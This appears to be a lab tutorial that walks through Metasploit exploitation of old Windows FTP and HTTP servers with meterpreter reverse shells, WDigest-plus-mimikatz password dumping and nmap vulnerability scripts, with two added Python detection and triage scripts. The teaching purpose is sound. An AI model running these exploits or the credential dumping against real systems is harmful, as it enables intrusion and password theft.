Hack Remote Windows PC using PCMAN FTP Server Buffer Overflow - PUT Command

This module exploits a buffer overflow vulnerability found in the PUT command of the PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous credentials are enabled...

Exploit Targets
PCMAN FTP v2.0.7 Server

Requirement
Attacker: kali Linux
Victim PC: Windows XP SP 3

Most PCMan FTP Server installations listen on port 21, so to discover information about the PCMan FTP Server we run the following scan:

nmap -sV 192.168.0.127


Open a Kali terminal and type msfconsole


Now type use exploit/windows/ftp/pcman_put
msf exploit (pcman_put)>set payload windows/meterpreter/reverse_tcp
msf exploit (pcman_put)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (pcman_put)>set rhost 192.168.0.127
msf exploit (pcman_put)>set rport 21
msf exploit (pcman_put)>exploit

Hack Remote Windows PC using Easy File Sharing HTTP Server 7.2 SEH Overflow

This module exploits an SEH overflow in the Easy File Sharing HTTP Server 7.2 software.

Exploit Targets
Easy File Sharing HTTP Server 7.2

Requirement
Attacker: kali Linux
Victim PC: Windows 7

Most Easy File Sharing HTTP Server installations listen on port 80 or 8080, so to discover information about the Easy File Sharing HTTP Server we run the following scan:

nmap -sV 192.168.0.103


Open a Kali terminal and type msfconsole


Now type use exploit/windows/http/easyfilesharing_seh
msf exploit (easyfilesharing_seh)>set payload windows/meterpreter/reverse_tcp
msf exploit (easyfilesharing_seh)>set lhost 192.168.0.119 (IP of Local Host)
msf exploit (easyfilesharing_seh)>set rhost 192.168.0.103
msf exploit (easyfilesharing_seh)>set rport 8080
msf exploit (easyfilesharing_seh)>exploit


Hack Remote Windows 10 Password in Plain Text using Wdigest Credential Caching Exploit

On Windows 8/2012 or higher, the Digest Security Provider (WDIGEST) is disabled by default. This module enables/disables credential caching by adding/changing the value of the UseLogonCredential DWORD under the WDIGEST provider's Registry key. Any subsequent logins will allow mimikatz to recover the plain text passwords from the system's memory.

Exploit Targets
Windows 10

Requirement
Attacker: kali Linux
Victim PC: Windows 10


Open a Kali terminal and type msfconsole


Now type use post/windows/manage/wdigest_caching
msf exploit (wdigest_caching)>set session 1
msf exploit (wdigest_caching)>exploit


To send the mimikatz binary to the target system, use the following command:

upload /usr/share/mimikatz/x64/mimikatz.exe e:\\


Type the following command to enable the debug privilege:

privilege::debug

Then type the following command to dump the users' passwords in plain text.

sekurlsa::logonpasswords
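Added defensive example, not part of the original page: a Python audit that reads the UseLogonCredential value from `reg query` output and flags a Sysmon Event ID 13 (registry value set) record that turns it on. The registry output and the event record are constructed samples.

```python
import re
from typing import Optional

# Registry location the wdigest_caching post module changes (from the text above).
WDIGEST_KEY = r"HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"
VALUE_NAME = "UseLogonCredential"

def parse_reg_query(output: str) -> Optional[int]:
    """Extract the UseLogonCredential DWORD from `reg query` text; None if absent."""
    m = re.search(r"UseLogonCredential\s+REG_DWORD\s+0x([0-9a-fA-F]+)", output)
    return int(m.group(1), 16) if m else None

def wdigest_caching_enabled(value: Optional[int], modern_windows: bool) -> bool:
    """Windows 8/2012+ defaults to off (missing or 0 = off); older Windows caches unless set to 0."""
    if value is None:
        return not modern_windows
    return value != 0

def is_wdigest_tamper_event(event: dict) -> bool:
    """Flag a Sysmon Event ID 13 record that sets UseLogonCredential to 1."""
    if event.get("EventID") != 13:
        return False
    target = event.get("TargetObject", "")
    if not target.lower().endswith(r"\wdigest\uselogoncredential"):
        return False
    return "0x00000001" in event.get("Details", "")

# Constructed sample of `reg query` output after caching has been enabled.
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
    UseLogonCredential    REG_DWORD    0x1
"""

# Constructed Sysmon-style registry event describing the same change.
SAMPLE_EVENT = {
    "EventID": 13,
    "TargetObject": r"HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential",
    "Details": "DWORD (0x00000001)",
}

if __name__ == "__main__":
    v = parse_reg_query(SAMPLE_REG_OUTPUT)
    print("UseLogonCredential =", v, "-> caching enabled:", wdigest_caching_enabled(v, True))
    print("tamper event detected:", is_wdigest_tamper_event(SAMPLE_EVENT))
```

Setting the value back to 0 (or deleting it on Windows 8/2012 and later) restores the default where WDigest does not keep plain text credentials in LSASS.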

Finding Vulnerability in EasyCafe Server using Metasploit

This module exploits a file retrieval vulnerability in EasyCafe Server. The vulnerability can be triggered by sending a specially crafted packet (opcode 0x43) to port 831/TCP. This module has been successfully tested on EasyCafe Server version 2.2.14 (Trial mode and Demo mode) on Windows XP SP3 and Windows 7 SP1. Note that the server will throw a popup message box if the specified file does not exist.

Exploit Targets
EasyCafe Server version 2.2.14

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open a Kali terminal and type msfconsole


Now type use auxiliary/scanner/misc/easycafe_server_fileaccess
msf exploit (easycafe_server_fileaccess)>set rhosts 192.168.0.103
msf exploit (easycafe_server_fileaccess)>set rport 831
msf exploit (easycafe_server_fileaccess)>exploit



The retrieved file is saved under the /root/.msf4/ directory.

Finding Vulnerability in Server/Client using Nmap

Heartbleed bug
The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected by the SSL/TLS encryption used to secure the Internet.  

Open a terminal in Kali

nmap --script=ssl-heartbleed 192.168.0.114


Check the output from Nmap to see whether the server is vulnerable or not

Poodle Bug
The POODLE attack is a man-in-the-middle exploit which takes advantage of Internet and security software clients' fallback to SSL 3.0 (Wikipedia).

Open a terminal in Kali
nmap --script ssl-poodle 192.168.0.114


IRC Backdoor
Checks if an IRC server is backdoored by running a time-based command (ping) and checking how long it takes to respond. This script can be used to run an arbitrary command on the remote system. 

Open a terminal in Kali
nmap -sV --script=irc-unrealircd-backdoor  -p 6667 192.168.1.6


MS08-067 Vulnerability
Detects Microsoft Windows systems vulnerable to the remote code execution vulnerability known as MS08-067. This check is dangerous and it may crash systems.

Open a terminal in Kali
nmap --script smb-vuln-ms08-067 -p 445 192.168.0.114


RDP Vulnerability
Checks if a machine is vulnerable to MS12-020. MS12-020 addresses a denial-of-service vulnerability inside Terminal Server.

nmap -sV --script=rdp-ms12-020  -p 3389 192.168.0.114


Vsftpd Backdoor
Tests for the presence of the vsFTPd 2.3.4 backdoor reported CVE-2011-2523. This script attempts to exploit the backdoor using the innocuous id command by default, but that can be changed with the exploit.cmd or ftp-vsftpd-backdoor.cmd script arguments.

nmap --script ftp-vsftpd-backdoor -p 21 192.168.1.6
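Added example, not code from the original page: a small Python triage script that parses nmap's -oX XML output for the checks listed above and reports only findings whose state is VULNERABLE, so "NOT VULNERABLE" and error output are not counted. The sample XML is constructed and mirrors the layout the NSE vulns library emits (one table per CVE with an elem key="state"); the ftp-vsftpd-backdoor and irc-unrealircd-backdoor scripts are covered by the unstructured-output fallback.

```python
import re
import xml.etree.ElementTree as ET
from typing import List, Tuple

# Constructed sample of `nmap -oX` output for three of the checks above.
SAMPLE_NMAP_XML = """<nmaprun>
 <host><address addr="192.168.0.114" addrtype="ipv4"/>
  <ports>
   <port protocol="tcp" portid="443"><state state="open"/>
    <script id="ssl-heartbleed" output="VULNERABLE: ...">
     <table key="CVE-2014-0160"><elem key="title">The Heartbleed Bug</elem>
      <elem key="state">VULNERABLE</elem></table>
    </script>
    <script id="ssl-poodle" output="NOT VULNERABLE">
     <table key="CVE-2014-3566"><elem key="state">NOT VULNERABLE</elem></table>
    </script>
   </port>
   <port protocol="tcp" portid="445"><state state="open"/>
    <script id="smb-vuln-ms08-067" output="Could not negotiate a connection"/>
   </port>
  </ports>
 </host>
</nmaprun>"""

def vulnerable_findings(xml_text: str) -> List[Tuple[str, int, str, str]]:
    """Return (host, port, script id, finding id) for every check reported VULNERABLE.
    Uses the structured elem key="state" when present, otherwise the script output text."""
    findings = []
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            portid = int(port.get("portid"))
            for script in port.iter("script"):
                sid = script.get("id")
                tables = script.findall("table")
                if tables:
                    for t in tables:
                        state = t.findtext("elem[@key='state']", "")
                        if state.strip() == "VULNERABLE":
                            findings.append((addr, portid, sid, t.get("key")))
                elif re.match(r"\s*VULNERABLE", script.get("output", "")):
                    findings.append((addr, portid, sid, "unstructured"))
    return findings

if __name__ == "__main__":
    for addr, port, sid, vid in vulnerable_findings(SAMPLE_NMAP_XML):
        print(f"{addr}:{port} {sid} -> {vid}")
```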

